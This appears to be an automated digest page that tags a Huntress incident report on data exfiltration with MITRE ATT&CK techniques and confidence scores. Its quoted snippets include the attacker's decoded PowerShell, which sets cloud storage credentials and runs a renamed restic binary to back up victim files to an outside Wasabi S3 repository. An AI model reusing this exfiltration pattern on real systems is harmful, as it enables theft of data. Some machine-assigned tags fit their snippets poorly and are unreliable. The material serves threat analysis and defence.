TTPwire Vol. 1 · MITRE ATT&CK·Tagged

Huntress

Data Exfiltration and Threat Actor Infrastructure Exposed

2026-03-12

ATT&CK techniques detected (10 predictions)

T1486 Data Encrypted for Impact (99%)
“messages, which is also associated with other ransomware variants/families (such as Akira) that use the RestartManager API to encrypt locked files. In this incident, Huntress analysts were not able to determine the initial access vector, as the agent was not fully deployed ac…”

T1486 Data Encrypted for Impact (99%)
“agent. Then the following message appeared in the Windows Event Log: SecurityCenter/15; VIPRE Business Agent, SECURITY_PRODUCT_STATE_OFF. This was then followed by MsiInstaller and System Restore messages in the Windows Event Log indicating that the VIPRE Business Agent …”

T1053.005 Scheduled Task (95%)
“being deployed within a customer’s infrastructure. Upon closer inspection, analysts determined that the Huntress agent was not completely deployed across that infrastructure, inhibiting visibility and obviating early detection. In addition, the customer was not using SIEM, so e…”

T1059.001 PowerShell (93%)
“was run, and when decoded, was similar to the above command. The one exception was the final line in the command, which appeared as follows: C:\Windows\System32\winupdate.exe backup --files-from C:\Users\Public\Documents\new.txt Huntress analysts were unabl…”

T1486 Data Encrypted for Impact (87%)
“[redacted] $env:RESTIC_PASSWORD = 'password' C:\Windows\System32\winupdate.exe backup --files-from C:\Users\Public\Documents\new.txt In this prior incident, the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY variables were identical to what…”

T1059.001 PowerShell (83%)
“task, a Base64-encoded PowerShell command is run, and when decoded, that command appears as follows: $env:AWS_ACCESS_KEY_ID = [redacted] $env:AWS_SECRET_ACCESS_KEY = [redacted] $env:RESTIC_REPOSITORY = 's3:s3.wasabisys.com/[redacted] $env:…”

T1059.001 PowerShell (76%)
“being deployed within a customer’s infrastructure. Upon closer inspection, analysts determined that the Huntress agent was not completely deployed across that infrastructure, inhibiting visibility and obviating early detection. In addition, the customer was not using SIEM, so e…”

T1003 OS Credential Dumping (37%)
“[redacted] $env:RESTIC_PASSWORD = 'password' C:\Windows\System32\winupdate.exe backup --files-from C:\Users\Public\Documents\new.txt In this prior incident, the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY variables were identical to what…”

T1080 Taint Shared Content (34%)
“agent. Then the following message appeared in the Windows Event Log: SecurityCenter/15; VIPRE Business Agent, SECURITY_PRODUCT_STATE_OFF. This was then followed by MsiInstaller and System Restore messages in the Windows Event Log indicating that the VIPRE Business Agent …”

T1074 Data Staged (31%)
“Data Exfiltration and Threat Actor Infrastructure Exposed. Acknowledgements: special thanks to Amelia Casley, Anton Ovrutsky, Jamie Dumas, Josh Allman, and Michael Tigges for their work in triaging and investigating these incidents. Huntress SOC analysts have seen a great deal of…”

Summary

Threat actors are people too, and like everyone else they make mistakes. These mistakes can reveal insights into the threat actor, or even expose access to their infrastructure.